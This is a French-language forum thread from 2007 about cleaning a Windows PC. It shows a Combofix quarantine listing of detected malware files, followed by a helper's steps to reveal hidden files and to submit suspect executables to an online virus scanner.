2007-08-20 19:43	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising917.exe.vir
2007-08-20 19:43	  23850	--a------	C:\Qoobox\Quarantine\C\WINDOWS\273.exe.vir
2007-08-20 19:43	  23850	--a------	C:\Qoobox\Quarantine\C\WINDOWS\97.exe.vir
2007-08-20 19:43	  24550	--a------	C:\Qoobox\Quarantine\C\WINDOWS\49.exe.vir
2007-08-20 19:43	  25014	--a------	C:\Qoobox\Quarantine\C\WINDOWS\470.exe.vir
2007-08-20 19:43	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\365.exe.vir
2007-08-20 19:43	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\385.exe.vir
2007-08-20 19:43	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\404.exe.vir
2007-08-21 21:26	  276	--a------	C:\Qoobox\Quarantine\Registry_backups\LEGACY_NPF.reg.cf


Structure du dossier
Le num‚ro de s‚rie du volume est 1857-C4DC
C:\QOOBOX
\---Quarantine
+---C
|   \---WINDOWS
|		   229.exe.vir
|		   273.exe.vir
|		   297.exe.vir
|		   365.exe.vir
|		   385.exe.vir
|		   404.exe.vir
|		   421.exe.vir
|		   470.exe.vir
|		   49.exe.vir
|		   576.exe.vir
|		   659.exe.vir
|		   842.exe.vir
|		   922.exe.vir
|		   97.exe.vir
|		   rising163.exe.vir
|		   rising316.exe.vir
|		   rising334.exe.vir
|		   rising391.exe.vir
|		   rising433.exe.vir
|		   rising745.exe.vir
|		   rising810.exe.vir
|		   rising832.exe.vir
|		   rising847.exe.vir
|		   rising916.exe.vir
|		   rising917.exe.vir
|		   SiSport.sys.vir
|		   
\---Registry_backups
		LEGACY_NPF.reg.cf

Modifié le 22 août 2007 par julien88

[bruce lee]

1/Affiche tout les fichiers:

 

Démarrer, Poste de travail ou autre dossier, Menu Outils, Option des dossiers, onglet Affichage :

Cocher la case : Afficher les fichiers et dossiers cachés

Décocher la case : Masquer les extensions des fichiers dont le type est connu

Décocher la case : Masquer les fichiers protégés du système d'exploitation

cliquer sur "Appliquer"

cliquer sur le bouton "Appliquer à tous les dossiers" / OK

 

 

 

2/Rend toi ensuite sur ce site http://virusscan.jotti.org/ et fait analyser Xenomorph_slim.exe qui se trouve

ici:

 

C:\Xenomorph_slim.exe

 

puis post le resultat.

 

 

Fait la même manip avec:

 

C:\latency.exe

C:\cpuz.exe

 

 

Poste également le résultat de l'analyse.

 

@+